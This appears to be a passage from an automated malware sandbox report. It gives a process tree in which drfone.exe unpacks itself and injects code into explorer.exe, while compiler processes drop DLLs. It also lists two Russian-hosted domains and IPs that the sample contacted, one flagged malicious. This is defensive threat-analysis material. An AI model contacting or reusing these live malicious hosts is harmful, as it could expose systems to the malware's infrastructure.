            contacts babsgans.website 45.142.215.100:443 (local ports 49767, 49768), CLOUDSOLUTIONSRU, Russian Federation
          csc.exe (45) - dropped C:\Users\user\AppData\Local\...\xqhvpwja.dll (PE32)
            cvtres.exe (50)
          csc.exe (48) - dropped C:\Users\user\AppData\Local\...\r1g0ykja.dll (PE32)
            cvtres.exe (52)
      conhost.exe (35)
    conhost.exe (19)
  drfone.exe (12) - Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Injects code into the Windows Explorer (explorer.exe); 5 other signatures
    conhost.exe (21)
  iexplore.exe (15)
    iexplore.exe (23)
      contacts hapynewyear.xyz 45.133.216.84:443 (local ports 49729, 49730), CLOUDSOLUTIONSRU, Russian Federation
    iexplore.exe (26)
    iexplore.exe (28)
    6 other processes (30)

Contacted Public IPs

IP              Domain   Country             ASN     ASN Name          Malicious
45.133.216.84   unknown  Russian Federation  202933  CLOUDSOLUTIONSRU  false
45.142.215.100  unknown  Russian Federation  202933  CLOUDSOLUTIONSRU  true

Contacted Domains

Name              IP              Active
babsgans.website  45.142.215.100  true
hapynewyear.xyz   45.133.216.84   true